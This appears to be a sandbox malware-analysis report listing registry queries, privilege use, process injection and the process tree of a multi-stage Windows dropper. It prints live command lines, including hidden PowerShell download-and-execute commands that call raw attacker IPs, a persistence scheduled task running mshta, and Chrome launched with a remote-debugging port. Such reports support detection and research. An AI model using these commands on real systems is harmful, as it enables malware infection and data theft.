Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\dmax\rqrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp2KGUWLTSFOVDS7ZH2HNGQRTCDADMRWVV.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1704 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe C:\Windows\SysWOW64\cmd.exe
PID 1704 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe C:\Windows\SysWOW64\cmd.exe
PID 1704 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe C:\Windows\SysWOW64\cmd.exe
PID 1704 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe C:\Windows\SysWOW64\cmd.exe
PID 1704 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe C:\Windows\SysWOW64\mshta.exe
PID 1704 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe C:\Windows\SysWOW64\mshta.exe
PID 1704 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe C:\Windows\SysWOW64\mshta.exe
PID 1704 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe C:\Windows\SysWOW64\mshta.exe
PID 608 wrote to memory of 2248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 608 wrote to memory of 2248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 608 wrote to memory of 2248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 608 wrote to memory of 2248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2404 wrote to memory of 2120 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2120 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2120 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2404 wrote to memory of 2120 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2120 wrote to memory of 2740 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE
PID 2120 wrote to memory of 2740 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE
PID 2120 wrote to memory of 2740 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE
PID 2120 wrote to memory of 2740 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE
PID 2740 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2740 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2740 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2740 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 840 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 840 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 840 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 840 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 2992 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 2992 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 2992 wrote to memory of 2304 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 2304 wrote to memory of 1072 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2304 wrote to memory of 1072 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2304 wrote to memory of 1072 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1072 wrote to memory of 772 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1072 wrote to memory of 772 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1072 wrote to memory of 772 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 840 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 840 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 840 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 840 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 1948 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1948 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1948 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1948 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1492 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 1492 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 1492 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 1492 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 840 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
PID 840 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
PID 840 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
PID 840 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
PID 2000 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2000 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2000 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2000 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2704 wrote to memory of 2716 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2704 wrote to memory of 2716 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2704 wrote to memory of 2716 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2704 wrote to memory of 2152 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Windows\system32\ctfmon.exe
PID 2704 wrote to memory of 2152 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Windows\system32\ctfmon.exe
PID 2704 wrote to memory of 2152 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Windows\system32\ctfmon.exe
PID 2704 wrote to memory of 1944 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe

"C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn 6gRrZmayRUH /tr "mshta C:\Users\Admin\AppData\Local\Temp\uQGIWnT9Z.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\uQGIWnT9Z.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn 6gRrZmayRUH /tr "mshta C:\Users\Admin\AppData\Local\Temp\uQGIWnT9Z.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE

"C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9F0.tmp\9F1.tmp\9F2.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe

"C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef68b9758,0x7fef68b9768,0x7fef68b9778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

